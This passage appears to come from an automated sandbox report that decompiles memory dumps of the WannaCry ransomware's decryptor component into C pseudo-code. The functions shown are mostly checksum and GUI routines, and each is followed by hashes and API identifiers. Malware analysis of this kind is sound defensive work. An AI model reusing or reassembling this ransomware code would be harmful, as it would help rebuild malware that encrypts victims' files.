>> 
0x00000008) & 0x000000ff ^ 0) * 4) ^ ( *(0x41b60c + (( *(0x41b60c + (_t29 & 0x000000ff ^ 0) * 4) ^ _t29 >> 0x00000008) & 0x000000ff ^ 0) * 4) ^ ( *(0x41b60c + (_t29 & 0x000000ff ^ 0) * 4) ^ _t29 >> 0x00000008) >> 0x00000008) >> 0x00000008) & 0x000000ff ^ 0) * 4) ^ ( *(0x41b60c + (( *(0x41b60c + (( *(0x41b60c + (_t29 & 0x000000ff ^ 0) * 4) ^ _t29 >> 0x00000008) & 0x000000ff ^ 0) * 4) ^ ( *(0x41b60c + (_t29 & 0x000000ff ^ 0) * 4) ^ _t29 >> 0x00000008) >> 0x00000008) & 0x000000ff ^ 0) * 4) ^ ( *(0x41b60c + (( *(0x41b60c + (_t29 & 0x000000ff ^ 0) * 4) ^ _t29 >> 0x00000008) & 0x000000ff ^ 0) * 4) ^ ( *(0x41b60c + (_t29 & 0x000000ff ^ 0) * 4) ^ _t29 >> 0x00000008) >> 0x00000008) >> 0x00000008) >> 0x00000008) & 0x000000ff ^ 0) * 4) ^ ( *(0x41b60c + (( *(0x41b60c + (( *(0x41b60c + (( *(0x41b60c + (_t29 & 0x000000ff ^ 0) * 4) ^ _t29 >> 0x00000008) & 0x000000ff ^ 0) * 4) ^ ( *(0x41b60c + (_t29 & 0x000000ff ^ 0) * 4) ^ _t29 >> 0x00000008) >> 0x00000008) & 0x000000ff ^ 0) * 4) ^ ( *(0x41b60c + (( *(0x41b60c + (_t29 & 0x000000ff ^ 0) * 4) ^ _t29 >> 0x00000008) & 0x000000ff ^ 0) * 4) ^ ( *(0x41b60c + (_t29 & 0x000000ff ^ 0) * 4) ^ _t29 >> 0x00000008) >> 0x00000008) >> 0x00000008) & 0x000000ff ^ 0) * 4) ^ ( *(0x41b60c + (( *(0x41b60c + (( *(0x41b60c + (_t29 & 0x000000ff ^ 0) * 4) ^ _t29 >> 0x00000008) & 0x000000ff ^ 0) * 4) ^ ( *(0x41b60c + (_t29 & 0x000000ff ^ 0) * 4) ^ _t29 >> 0x00000008) >> 0x00000008) & 0x000000ff ^ 0) * 4) ^ ( *(0x41b60c + (( *(0x41b60c + (_t29 & 0x000000ff ^ 0) * 4) ^ _t29 >> 0x00000008) & 0x000000ff ^ 0) * 4) ^ ( *(0x41b60c + (_t29 & 0x000000ff ^ 0) * 4) ^ _t29 >> 0x00000008) >> 0x00000008) >> 0x00000008) >> 0x00000008) >> 0x00000008) & 0x000000ff ^ 0) * 4) ^ ( *(0x41b60c + (( *(0x41b60c + (( *(0x41b60c + (( *(0x41b60c + (( *(0x41b60c + (_t29 & 0x000000ff ^ 0) * 4) ^ _t29 >> 0x00000008) & 0x000000ff ^ 0) * 4) ^ ( *(0x41b60c + (_t29 & 0x000000ff ^ 0) * 4) ^ _t29 >> 0x00000008) >> 0x00000008) & 0x000000ff ^ 0) * 4) ^ ( *(0x41b60c + (( *(0x41b60c + (_t29 & 
0x000000ff ^ 0) * 4) ^ _t29 >> 0x00000008) & 0x000000ff ^ 0) * 4) ^ ( *(0x41b60c + (_t29 & 0x000000ff ^ 0) * 4) ^ _t29 >> 0x00000008) >> 0x00000008) >> 0x00000008) & 0x000000ff ^ 0) * 4) ^ ( *(0x41b60c + (( *(0x41b60c + (( *(0x41b60c + (_t29 & 0x000000ff ^ 0) * 4) ^ _t29 >> 0x00000008) & 0x000000ff ^ 0) * 4) ^ ( *(0x41b60c + (_t29 & 0x000000ff ^ 0) * 4) ^ _t29 >> 0x00000008) >> 0x00000008) & 0x000000ff ^ 0) * 4) ^ ( *(0x41b60c + (( *(0x41b60c + (_t29 & 0x000000ff ^ 0) * 4) ^ _t29 >> 0x00000008) & 0x000000ff ^ 0) * 4) ^ ( *(0x41b60c + (_t29 & 0x000000ff ^ 0) * 4) ^ _t29 >> 0x00000008) >> 0x00000008) >> 0x00000008) >> 0x00000008) & 0x000000ff ^ 0) * 4) ^ ( *(0x41b60c + (( *(0x41b60c + (( *(0x41b60c + (( *(0x41b60c + (_t29 & 0x000000ff ^ 0) * 4) ^ _t29 >> 0x00000008) & 0x000000ff ^ 0) * 4) ^ ( *(0x41b60c + (_t29 & 0x000000ff ^ 0) * 4) ^ _t29 >> 0x00000008) >> 0x00000008) & 0x000000ff ^ 0) * 4) ^ ( *(0x41b60c + (( *(0x41b60c + (_t29 & 0x000000ff ^ 0) * 4) ^ _t29 >> 0x00000008) & 0x000000ff ^ 0) * 4) ^ ( *(0x41b60c + (_t29 & 0x000000ff ^ 0) * 4) ^ _t29 >> 0x00000008) >> 0x00000008) >> 0x00000008) & 0x000000ff ^ 0) * 4) ^ ( *(0x41b60c + (( *(0x41b60c + (( *(0x41b60c + (_t29 & 0x000000ff ^ 0) * 4) ^ _t29 >> 0x00000008) & 0x000000ff ^ 0) * 4) ^ ( *(0x41b60c + (_t29 & 0x000000ff ^ 0) * 4) ^ _t29 >> 0x00000008) >> 0x00000008) & 0x000000ff ^ 0) * 4) ^ ( *(0x41b60c + (( *(0x41b60c + (_t29 & 0x000000ff ^ 0) * 4) ^ _t29 >> 0x00000008) & 0x000000ff ^ 0) * 4) ^ ( *(0x41b60c + (_t29 & 0x000000ff ^ 0) * 4) ^ _t29 >> 0x00000008) >> 0x00000008) >> 0x00000008) >> 0x00000008) >> 0x00000008) >> 0x00000008) >> 0x00000008) & 0x000000ff ^ 0) * 4);
                                                      							_t76 = _t76 + 8;
                                                      							_t115 = _t115 - 1;
                                                      						} while (_t115 != 0);
                                                      					}
                                                      					if(_t118 != 0) {
                                                      						do {
                                                      							_t29 = _t29 >> 0x00000008 ^  *(0x41b60c + (_t29 & 0x000000ff ^ 0) * 4);
                                                      							_t76 = _t76 + 1;
                                                      							_t118 = _t118 - 1;
                                                      						} while (_t118 != 0);
                                                      					}
                                                      					return  !_t29;
                                                      				} else {
                                                      					return 0;
                                                      				}
                                                      			}








                                                      Memory Dump Source
                                                      • Source File: 00000019.00000002.7374755422.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000019.00000002.7374680120.0000000000400000.00000002.00000001.01000000.00000009.sdmp
                                                      • Associated: 00000019.00000002.7375004483.0000000000415000.00000002.00000001.01000000.00000009.sdmp
                                                      • Associated: 00000019.00000002.7375200339.000000000041F000.00000008.00000001.01000000.00000009.sdmp
                                                      • Associated: 00000019.00000002.7375280551.0000000000421000.00000004.00000001.01000000.00000009.sdmp
                                                      • Associated: 00000019.00000002.7375363659.0000000000423000.00000002.00000001.01000000.00000009.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_25_2_400000_@WanaDecryptor@.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 5d39ba973bdaee26a7e96979db138631e8a564ea24786ef9523c099e99afe77a
                                                      • Instruction ID: cecdefe8fda50f928b4117980ad8d25e533be349777a256c316ace181cfd3b57
                                                      • Opcode Fuzzy Hash: 5d39ba973bdaee26a7e96979db138631e8a564ea24786ef9523c099e99afe77a
                                                      • Instruction Fuzzy Hash: 1E31A6627A959207D350CEBEAC90277BB93D7DB306B6CC678D584C7A0EC579D8078244
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      C-Code - Quality: 86%
                                                      			E004090F0(intOrPtr* __ecx, void* __fp0) {
                                                      				signed int _t226;
                                                      				signed int _t230;
                                                      				struct tagPOINT _t232;
                                                      				long _t233;
                                                      				signed int _t237;
                                                      				signed int _t242;
                                                      				intOrPtr _t246;
                                                      				intOrPtr* _t264;
                                                      				signed int _t269;
                                                      				signed int _t270;
                                                      				signed int _t271;
                                                      				signed int _t272;
                                                      				signed int _t276;
                                                      				intOrPtr _t279;
                                                      				signed int _t282;
                                                      				intOrPtr* _t283;
                                                      				struct tagPOINT _t295;
                                                      				signed int _t311;
                                                      				signed int _t314;
                                                      				signed int** _t321;
                                                      				intOrPtr _t361;
                                                      				intOrPtr _t418;
                                                      				intOrPtr* _t429;
                                                      				signed int* _t433;
                                                      				long _t437;
                                                      				signed int _t438;
                                                      				intOrPtr* _t440;
                                                      				signed int _t441;
                                                      				intOrPtr _t442;
                                                      				void* _t443;
                                                      
                                                      				_push(0xffffffff);
                                                      				_push(E0041414D);
                                                      				_push( *[fs:0x0]);
                                                      				 *[fs:0x0] = _t442;
                                                      				_t443 = _t442 - 0xc4;
                                                      				_t321 =  *(_t443 + 0xd8);
                                                      				_t226 = _t321[1];
                                                      				_t429 = __ecx;
                                                      				if((_t226 & 0x00000003) == 0) {
                                                      					L49:
                                                      					 *[fs:0x0] =  *((intOrPtr*)(_t443 + 0xd4));
                                                      					return _t226;
                                                      				}
                                                      				_t433 =  *_t321;
                                                      				 *(_t443 + 0x40) = _t226 & 0x00000004;
                                                      				 *(_t443 + 0x10) = 0;
                                                      				L00412DA6();
                                                      				_push(_t443 + 0x14);
                                                      				 *((intOrPtr*)(_t443 + 0xe0)) = 0;
                                                      				L00412DD6();
                                                      				_t230 = _t321[1] & 0x00000300;
                                                      				if(_t230 == 0x100) {
                                                      					if( *((intOrPtr*)( *(_t443 + 0x14) - 8)) == 0) {
                                                      						_push("%d%%");
                                                      						L00412DA0();
                                                      					}
                                                      					_t232 = _t321[7];
                                                      					 *((intOrPtr*)(_t443 + 0x28)) = _t321[6].x - _t232;
                                                      					asm("fild dword [esp+0x28]");
                                                      					 *((intOrPtr*)(_t443 + 0x28)) = _t321[8] - _t232;
                                                      					asm("fidiv dword [esp+0x28]");
                                                      					L0041304A();
                                                      					 *(_t443 + 0x10) = _t232;
                                                      				} else {
                                                      					if(_t230 == 0x200) {
                                                      						if( *((intOrPtr*)( *(_t443 + 0x14) - 8)) == 0) {
                                                      							_push("%d");
                                                      							L00412DA0();
                                                      						}
                                                      						 *(_t443 + 0x10) = _t321[6];
                                                      					}
                                                      				}
                                                      				_t226 =  *(_t443 + 0x14);
                                                      				if( *((intOrPtr*)(_t226 - 8)) == 0) {
                                                      					L48:
                                                      					 *(_t443 + 0xdc) = 0xffffffff;
                                                      					L00412CC2();
                                                      					goto L49;
                                                      				} else {
                                                      					_t233 = SendMessageA( *(_t429 + 0x20), 0x31, 0, 0);
                                                      					L00412DE2();
                                                      					_t437 = _t233;
                                                      					 *(_t443 + 0x54) = _t433;
                                                      					 *(_t443 + 0x50) = 0x416794;
                                                      					 *(_t443 + 0xdc) = 1;
                                                      					E00409DF0(_t443 + 0x58);
                                                      					 *(_t443 + 0x58) = 0x416780;
                                                      					 *((char*)(_t443 + 0xe0)) = 2;
                                                      					 *(_t443 + 0x64) = 0;
                                                      					 *(_t443 + 0x54) = 0x41677c;
                                                      					E00409870(_t443 + 0x54, _t437);
                                                      					 *(_t443 + 0x68) = _t433;
                                                      					 *((char*)(_t443 + 0xe0)) = 4;
                                                      					 *(_t443 + 0x70) = 0xffffffff;
                                                      					 *(_t443 + 0x68) = 0x416778;
                                                      					_t237 =  *((intOrPtr*)( *_t433 + 0x38))( *((intOrPtr*)(_t429 + 0x60)), _t233);
                                                      					 *(_t443 + 0x90) = _t237;
                                                      					 *(_t443 + 0x6c) = _t237;
                                                      					 *(_t443 + 0x88) = _t433;
                                                      					_push(1);
                                                      					 *((char*)(_t443 + 0xe0)) = 6;
                                                      					 *(_t443 + 0x90) = 0;
                                                      					 *(_t443 + 0x88) = 0x416774;
                                                      					L00412DC4();
                                                      					 *(_t443 + 0x70) = _t237;
                                                      					 *(_t443 + 0x8c) = _t237;
                                                      					 *(_t443 + 0x7c) = _t433;
                                                      					_push(0xe);
                                                      					 *((char*)(_t443 + 0xe0)) = 8;
                                                      					 *(_t443 + 0x84) = 0xffffffff;
                                                      					 *(_t443 + 0x7c) = 0x416770;
                                                      					L00413004();
                                                      					 *(_t443 + 0x74) = _t237;
                                                      					 *(_t443 + 0x80) = _t237;
                                                      					 *((char*)(_t443 + 0xe4)) = 9;
                                                      					GetWindowOrgEx(_t433[2], _t443 + 0x1c);
                                                      					 *(_t443 + 0x48) =  *(_t443 + 0x1c);
                                                      					 *(_t443 + 0x4c) =  *(_t443 + 0x20);
                                                      					L00412DA6();
                                                      					_push( *(_t443 + 0x10));
                                                      					_push( *(_t443 + 0x14));
                                                      					_push(_t443 + 0x1c);
                                                      					 *((char*)(_t443 + 0xe8)) = 0xa;
                                                      					L00412E00();
                                                      					_t443 = _t443 + 0xc;
                                                      					_t242 = 0;
                                                      					 *((intOrPtr*)(_t443 + 0x28)) = 0;
                                                      					if(_t437 != 0) {
                                                      						GetObjectA( *(_t437 + 4), 0x3c, _t443 + 0x98);
                                                      						_t242 = 0;
                                                      						 *((intOrPtr*)(_t443 + 0x28)) = (0x66666667 *  *(_t443 + 0xa0) >> 0x20 >> 2) + (0x66666667 *  *(_t443 + 0xa0) >> 0x20 >> 2 >> 0x1f);
                                                      					}
                                                      					 *(_t443 + 0x10) = _t242;
                                                      					 *(_t443 + 0x2c) = _t242;
                                                      					 *(_t443 + 0x24) = _t242;
                                                      					_t438 = 0;
                                                      					GetTextExtentPoint32A(_t433[2],  *(_t443 + 0x18),  *( *(_t443 + 0x18) - 8), _t443 + 0x1c);
                                                      					_t246 =  *((intOrPtr*)(_t443 + 0x28));
                                                      					if(_t246 != 0) {
                                                      						if(_t246 != 0x5a) {
                                                      							if(_t246 != 0xb4) {
                                                      								if(_t246 != 0x10e) {
                                                      									goto L21;
                                                      								}
                                                      								_t441 =  *(_t443 + 0x20);
                                                      								 *(_t443 + 0x10) = _t441;
                                                      								 *(_t443 + 0x2c) =  *(_t443 + 0x1c);
                                                      								_t438 =  ~_t441;
                                                      								L20:
                                                      								 *(_t443 + 0x24) = 0;
                                                      								goto L21;
                                                      							}
                                                      							_t311 =  *(_t443 + 0x20);
                                                      							 *(_t443 + 0x2c) = _t311;
                                                      							_t438 = 0;
                                                      							 *(_t443 + 0x10) =  *(_t443 + 0x1c);
                                                      							 *(_t443 + 0x24) =  ~_t311;
                                                      							goto L21;
                                                      						}
                                                      						_t438 =  *(_t443 + 0x20);
                                                      						 *(_t443 + 0x10) = _t438;
                                                      						 *(_t443 + 0x2c) =  *(_t443 + 0x1c);
                                                      						goto L20;
                                                      					} else {
                                                      						_t314 =  *(_t443 + 0x20);
                                                      						 *(_t443 + 0x10) =  *(_t443 + 0x1c);
                                                      						 *(_t443 + 0x2c) = _t314;
                                                      						 *(_t443 + 0x24) = _t314;
                                                      						L21:
                                                      						GetViewportOrgEx(_t433[2], _t443 + 0x1c);
                                                      						if((_t321[1] & 0x00000010) == 0) {
                                                      							asm("cdq");
                                                      							 *(_t443 + 0x44) =  *_t433;
                                                      							asm("cdq");
                                                      							 *((intOrPtr*)( *(_t443 + 0x48) + 0x40))(_t443 + 0x44, _t321[2] + (_t321[4] - _t321[2] + _t438 - _t321[2] >> 1), _t321[3] + (_t321[5] - _t321[3] +  *(_t443 + 0x24) -  *(_t443 + 0x24) >> 1));
                                                      							if( *((intOrPtr*)(_t429 + 0x60)) !=  *((intOrPtr*)(_t429 + 0x64))) {
                                                      								_t264 =  *((intOrPtr*)(_t443 + 0xec));
                                                      								if( *_t264 !=  *((intOrPtr*)(_t264 + 8))) {
                                                      									 *((intOrPtr*)( *_t429 + 0xcc))(_t321, _t264, _t443 + 0x1c, _t443 + 0x48);
                                                      								}
                                                      								_t440 =  *((intOrPtr*)(_t443 + 0xe8));
                                                      								if( *((intOrPtr*)(_t440 + 8)) >  *((intOrPtr*)( *((intOrPtr*)(_t443 + 0xec)) + 8))) {
                                                      									_t282 =  *((intOrPtr*)( *_t433 + 0x38))( *((intOrPtr*)(_t429 + 0x64)));
                                                      									if( *(_t443 + 0x90) == 0xffffffff) {
                                                      										 *(_t443 + 0x6c) = _t282;
                                                      									}
                                                      									_t283 = _t440;
                                                      									 *((intOrPtr*)(_t443 + 0x30)) =  *_t283;
                                                      									 *((intOrPtr*)(_t443 + 0x34)) =  *((intOrPtr*)(_t283 + 4));
                                                      									 *((intOrPtr*)(_t443 + 0x38)) =  *((intOrPtr*)(_t283 + 8));
                                                      									 *((intOrPtr*)(_t443 + 0x3c)) =  *((intOrPtr*)(_t283 + 0xc));
                                                      									 *((intOrPtr*)(_t443 + 0x30)) =  *((intOrPtr*)( *((intOrPtr*)(_t443 + 0xec)) + 8));
                                                      									 *((intOrPtr*)( *_t429 + 0xcc))(_t321, _t443 + 0x34, _t443 + 0x1c, _t443 + 0x48);
                                                      								}
                                                      								if( *_t440 >=  *((intOrPtr*)( *((intOrPtr*)(_t443 + 0xec))))) {
                                                      									L39:
                                                      									 *((intOrPtr*)( *_t433 + 0x40))(_t443 + 0x20,  *(_t443 + 0x1c),  *(_t443 + 0x20));
                                                      									 *(_t443 + 0xdc) = 9;
                                                      									L00412CC2();
                                                      									 *(_t443 + 0x78) = 0x416770;
                                                      									_t269 =  *(_t443 + 0x74);
                                                      									 *(_t443 + 0xdc) = 0xb;
                                                      									if(_t269 != 0xffffffff) {
                                                      										_push(_t269);
                                                      										L00413004();
                                                      									}
                                                      									 *(_t443 + 0x84) = 0x416774;
                                                      									_t270 =  *(_t443 + 0x70);
                                                      									 *(_t443 + 0xdc) = 0xc;
                                                      									if(_t270 != 0) {
                                                      										_push(_t270);
                                                      										L00412DC4();
                                                      									}
                                                      									 *(_t443 + 0x64) = 0x416778;
                                                      									_t271 =  *(_t443 + 0x6c);
                                                      									 *(_t443 + 0xdc) = 0xd;
                                                      									if(_t271 != 0xffffffff) {
                                                      										 *((intOrPtr*)( *_t433 + 0x38))(_t271);
                                                      									}
                                                      									 *(_t443 + 0x50) = 0x41677c;
                                                      									_t272 =  *(_t443 + 0x60);
                                                      									 *(_t443 + 0xdc) = 0xf;
                                                      									if(_t272 != 0) {
                                                      										 *((intOrPtr*)( *( *(_t443 + 0x54)) + 0x30))(_t272);
                                                      									}
                                                      									 *(_t443 + 0x60) = 0;
                                                      									L00412D52();
                                                      									_t226 = _t443 + 0x58;
                                                      									 *(_t443 + 0x58) = 0x415c00;
                                                      									 *(_t443 + 0x70) = _t226;
                                                      									 *(_t443 + 0xdc) = 0x10;
                                                      									L00412D52();
                                                      									 *(_t443 + 0x58) = 0x415bec;
                                                      									 *(_t443 + 0x50) = 0x416794;
                                                      									goto L48;
                                                      								} else {
                                                      									_t276 =  *((intOrPtr*)( *_t433 + 0x38))( *((intOrPtr*)(_t429 + 0x64)));
                                                      									if( *(_t443 + 0x6c) == 0xffffffff) {
                                                      										 *(_t443 + 0x6c) = _t276;
                                                      									}
                                                      									 *((intOrPtr*)(_t443 + 0x34)) =  *((intOrPtr*)(_t440 + 4));
                                                      									 *((intOrPtr*)(_t443 + 0x38)) =  *((intOrPtr*)(_t440 + 8));
                                                      									 *((intOrPtr*)(_t443 + 0x30)) =  *_t440;
                                                      									 *((intOrPtr*)(_t443 + 0x38)) =  *((intOrPtr*)( *((intOrPtr*)(_t443 + 0xec))));
                                                      									 *((intOrPtr*)(_t443 + 0x3c)) =  *((intOrPtr*)(_t440 + 0xc));
                                                      									_t279 =  *_t429;
                                                      									_push(_t443 + 0x48);
                                                      									_push(_t443 + 0x18);
                                                      									_t361 = _t443 + 0x38;
                                                      									L38:
                                                      									 *((intOrPtr*)(_t279 + 0xcc))(_t321, _t361);
                                                      									goto L39;
                                                      								}
                                                      							}
                                                      							 *((intOrPtr*)( *_t429 + 0xcc))(_t321,  *((intOrPtr*)(_t443 + 0xec)), _t443 + 0x1c, _t443 + 0x48);
                                                      							goto L39;
                                                      						}
                                                      						E00409D40(_t443 + 0x30, _t321,  *((intOrPtr*)(_t443 + 0xec)));
                                                      						_t295 =  *(_t443 + 0x2c);
                                                      						if( *(_t443 + 0x40) == 0) {
                                                      							_t295 =  *(_t443 + 0x10);
                                                      						}
                                                      						if(_t295 >  *((intOrPtr*)( *((intOrPtr*)(_t443 + 0xec)) + 8)) -  *((intOrPtr*)( *((intOrPtr*)(_t443 + 0xec))))) {
                                                      							goto L39;
                                                      						} else {
                                                      							asm("cdq");
                                                      							_t418 =  *((intOrPtr*)(_t443 + 0x34));
                                                      							 *(_t443 + 0x40) =  *_t433;
                                                      							asm("cdq");
                                                      							 *((intOrPtr*)( *(_t443 + 0x44) + 0x40))(_t443 + 0x98, ( *((intOrPtr*)(_t443 + 0x3c)) -  *((intOrPtr*)(_t443 + 0x30)) + _t438 - _t418 >> 1) +  *((intOrPtr*)(_t443 + 0x30)), ( *((intOrPtr*)(_t443 + 0x3c)) -  *((intOrPtr*)(_t443 + 0x34)) +  *(_t443 + 0x24) -  *(_t443 + 0x24) >> 1) + _t418);
                                                      							_t279 =  *_t429;
                                                      							_push(_t443 + 0x48);
                                                      							_t361 =  *((intOrPtr*)(_t443 + 0xf0));
                                                      							_push(_t443 + 0x18);
                                                      							goto L38;
                                                      						}
                                                      					}
                                                      				}
                                                      			}


                                                      APIs
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000019.00000002.7374755422.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000019.00000002.7374680120.0000000000400000.00000002.00000001.01000000.00000009.sdmp
                                                      • Associated: 00000019.00000002.7375004483.0000000000415000.00000002.00000001.01000000.00000009.sdmp
                                                      • Associated: 00000019.00000002.7375200339.000000000041F000.00000008.00000001.01000000.00000009.sdmp
                                                      • Associated: 00000019.00000002.7375280551.0000000000421000.00000004.00000001.01000000.00000009.sdmp
                                                      • Associated: 00000019.00000002.7375363659.0000000000423000.00000002.00000001.01000000.00000009.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_25_2_400000_@WanaDecryptor@.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: #2414#540#5875#6170#800#860$#2818#2860#3874ExtentMessageObjectPoint32SendTextViewportWindow_ftol
                                                      • String ID: %d%%$gfff$pgA$pgA$tgA$tgA$xgA$xgA$|gA$|gA$[A
                                                      • API String ID: 2923375784-3599407550
                                                      • Opcode ID: 7e6b703d67e7595773a4bd55965276fd3caf6c6c14634650179ea244f19e8907
                                                      • Instruction ID: e7c60e05cab477c723c52aa9b6021990c4bcf2d63edfa6d200c8e4e6b3644932
                                                      • Opcode Fuzzy Hash: 7e6b703d67e7595773a4bd55965276fd3caf6c6c14634650179ea244f19e8907
                                                      • Instruction Fuzzy Hash: D312E2B0208381DFD714CF69C484A9BBBE5BBC8304F148A2EF89997391D774E945CB66
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      C-Code - Quality: 72%
                                                      			E00405230(void* __ecx) {
                                                      				RECT* _v12;
                                                      				char _v20;
                                                      				char _v24;
                                                      				char _v28;
                                                      				char _v32;
                                                      				char _v36;
                                                      				char _v40;
                                                      				intOrPtr _v44;
                                                      				char _v48;
                                                      				char _v52;
                                                      				void* _v56;
                                                      				void* _v60;
                                                      				void* _v64;
                                                      				void* _v68;
                                                      				int _t98;
                                                      				int _t99;
                                                      				int _t104;
                                                      				char* _t106;
                                                      				void* _t109;
                                                      				char* _t110;
                                                      				signed int _t113;
                                                      				int _t114;
                                                      				void* _t117;
                                                      				char* _t118;
                                                      				char _t119;
                                                      				char* _t120;
                                                      				signed int _t122;
                                                      				void* _t123;
                                                      				int _t126;
                                                      				int _t127;
                                                      				int _t130;
                                                      				void* _t132;
                                                      				signed int _t136;
                                                      				signed int _t142;
                                                      				intOrPtr _t163;
                                                      				intOrPtr _t179;
                                                      				signed int _t182;
                                                      				signed int _t198;
                                                      				void* _t199;
                                                      				signed int _t200;
                                                      				void* _t201;
                                                      				intOrPtr* _t205;
                                                      				void* _t208;
                                                      				intOrPtr* _t212;
                                                      				intOrPtr* _t213;
                                                      				intOrPtr _t215;
                                                      
                                                      				_push(0xffffffff);
                                                      				_push(E00413918);
                                                      				_push( *[fs:0x0]);
                                                      				 *[fs:0x0] = _t215;
                                                      				_t208 = __ecx;
                                                      				_t182 =  *(__ecx + 0x70);
                                                      				if(_t182 != 1) {
                                                      					if(__eflags <= 0) {
                                                      						L33:
                                                      						_t98 = InvalidateRect( *(_t208 + 0x20), 0, 1);
                                                      						L34:
                                                      						 *[fs:0x0] = _v12;
                                                      						return _t98;
                                                      					}
                                                      					__eflags =  *((char*)(__ecx + 0x4b)) - 1;
                                                      					if( *((char*)(__ecx + 0x4b)) != 1) {
                                                      						L15:
                                                      						_t99 =  *(_t208 + 0x78);
                                                      						__eflags = _t99 - 3;
                                                      						if(_t99 != 3) {
                                                      							__eflags = _t99 - 2;
                                                      							if(_t99 != 2) {
                                                      								__eflags = _t99;
                                                      								if(_t99 != 0) {
                                                      									__eflags = _t99 - 1;
                                                      									if(_t99 != 1) {
                                                      										goto L33;
                                                      									}
                                                      									_t212 = _t208 + 0x44;
                                                      									_t198 =  *( *((intOrPtr*)(_t208 + 0x44)) - 8);
                                                      									_t136 =  *(_t208 + 0x74);
                                                      									asm("cdq");
                                                      									_t98 = _t198 / _t136;
                                                      									__eflags = _t98;
                                                      									if(_t98 == 0) {
                                                      										goto L34;
                                                      									}
                                                      									__eflags = _t198 - _t136;
                                                      									if(_t198 < _t136) {
                                                      										goto L34;
                                                      									}
                                                      									_t199 = 0;
                                                      									__eflags = _t98;
                                                      									if(_t98 <= 0) {
                                                      										goto L33;
                                                      									}
                                                      									_t126 = _t98;
                                                      									do {
                                                      										_push( *((intOrPtr*)(_t136 + _t199 +  *_t212 - 1)));
                                                      										_push(_t199);
                                                      										L00412E12();
                                                      										_push(1);
                                                      										_push( *(_t208 + 0x74) + _t199);
                                                      										L00412E0C();
                                                      										_t136 =  *(_t208 + 0x74);
                                                      										_t199 = _t199 + _t136;
                                                      										_t126 = _t126 - 1;
                                                      										__eflags = _t126;
                                                      									} while (_t126 != 0);
                                                      									goto L33;
                                                      								}
                                                      								_t213 = _t208 + 0x44;
                                                      								_t142 =  *(_t208 + 0x74);
                                                      								_t200 =  *( *((intOrPtr*)(_t208 + 0x44)) - 8);
                                                      								asm("cdq");
                                                      								_t104 = _t200 / _t142;
                                                      								__eflags = _t104;
                                                      								if(_t104 == 0) {
                                                      									L22:
                                                      									_t104 = 1;
                                                      									L23:
                                                      									_t201 = 0;
                                                      									__eflags = _t104;
                                                      									if(_t104 <= 0) {
                                                      										goto L33;
                                                      									}
                                                      									_t127 = _t104;
                                                      									do {
                                                      										_push( *((intOrPtr*)(_t201 +  *_t213)));
                                                      										_push(_t142 + _t201);
                                                      										L00412E12();
                                                      										_push(1);
                                                      										_push(_t201);
                                                      										L00412E0C();
                                                      										_t142 =  *(_t208 + 0x74);
                                                      										_t201 = _t201 + _t142;
                                                      										_t127 = _t127 - 1;
                                                      										__eflags = _t127;
                                                      									} while (_t127 != 0);
                                                      									goto L33;
                                                      								}
                                                      								__eflags = _t200 - _t142;
                                                      								if(_t200 >= _t142) {
                                                      									goto L23;
                                                      								}
                                                      								goto L22;
                                                      							}
                                                      							_t106 =  &_v32;
                                                      							_push( *(_t208 + 0x74));
                                                      							_push(_t106);
                                                      							L00412E24();
                                                      							_push( *(_t208 + 0x74));
                                                      							_push( &_v24);
                                                      							_v12 = 8;
                                                      							L00412E30();
                                                      							_push( &_v48);
                                                      							_push(_t106);
                                                      							_push( &_v36);
                                                      							_v20 = 9;
                                                      							L00412E18();
                                                      							_push(_t106);
                                                      							_v32 = 0xa;
                                                      							L00412D9A();
                                                      							_v36 = 9;
                                                      							L00412CC2();
                                                      							_v36 = 8;
                                                      							L00412CC2();
                                                      							_v36 = 0xffffffff;
                                                      							L00412CC2();
                                                      							goto L33;
                                                      						}
                                                      						_push( *(_t208 + 0x74));
                                                      						_push( &_v36);
                                                      						L00412E1E();
                                                      						_v12 = 5;
                                                      						_t109 =  *( *((intOrPtr*)(_t208 + 0x44)) - 8) -  *(_t208 + 0x74);
                                                      						_push(_t109);
                                                      						_push( &_v36);
                                                      						L00412E24();
                                                      						_push(_t109);
                                                      						_t110 =  &_v52;
                                                      						_push(_t110);
                                                      						_push( &_v40);
                                                      						_v20 = 6;
                                                      						L00412E18();
                                                      						_push(_t110);
                                                      						_v32 = 7;
                                                      						L00412D9A();
                                                      						_v36 = 6;
                                                      						L00412CC2();
                                                      						_v36 = 5;
                                                      						L00412CC2();
                                                      						_v36 = 0xffffffff;
                                                      						L00412CC2();
                                                      						goto L33;
                                                      					}
                                                      					_t163 =  *((intOrPtr*)( *((intOrPtr*)(__ecx + 0x44)) - 8));
                                                      					_t113 =  *(__ecx + 0x74) * _t182;
                                                      					__eflags = _t163 - _t113;
                                                      					if(_t163 >= _t113) {
                                                      						goto L15;
                                                      					}
                                                      					_t114 = _t113 - _t163;
                                                      					__eflags = _t114;
                                                      					if(_t114 <= 0) {
                                                      						goto L15;
                                                      					}
                                                      					_t130 = _t114;
                                                      					do {
                                                      						_push( *((intOrPtr*)(__ecx + 0x40)));
                                                      						L00412E36();
                                                      						_t130 = _t130 - 1;
                                                      						__eflags = _t130;
                                                      					} while (_t130 != 0);
                                                      					goto L15;
                                                      				}
                                                      				if( *((intOrPtr*)(__ecx + 0x4b)) != _t182) {
                                                      					L6:
                                                      					_t205 = _t208 + 0x44;
                                                      					if( *(_t208 + 0x78) != 0) {
                                                      						_t117 =  *((intOrPtr*)( *_t205 - 8)) - 1;
                                                      						_push(_t117);
                                                      						_push( &_v36);
                                                      						L00412E24();
                                                      						_t118 =  &_v36;
                                                      						_push(1);
                                                      						_push(_t118);
                                                      						_v12 = 2;
                                                      						L00412E1E();
                                                      						_push(_t117);
                                                      						_push(_t118);
                                                      						_push( &_v40);
                                                      						_v20 = 3;
                                                      						L00412E18();
                                                      						_push(_t118);
                                                      						_v32 = 4;
                                                      						L00412D9A();
                                                      						_v36 = 3;
                                                      						L00412CC2();
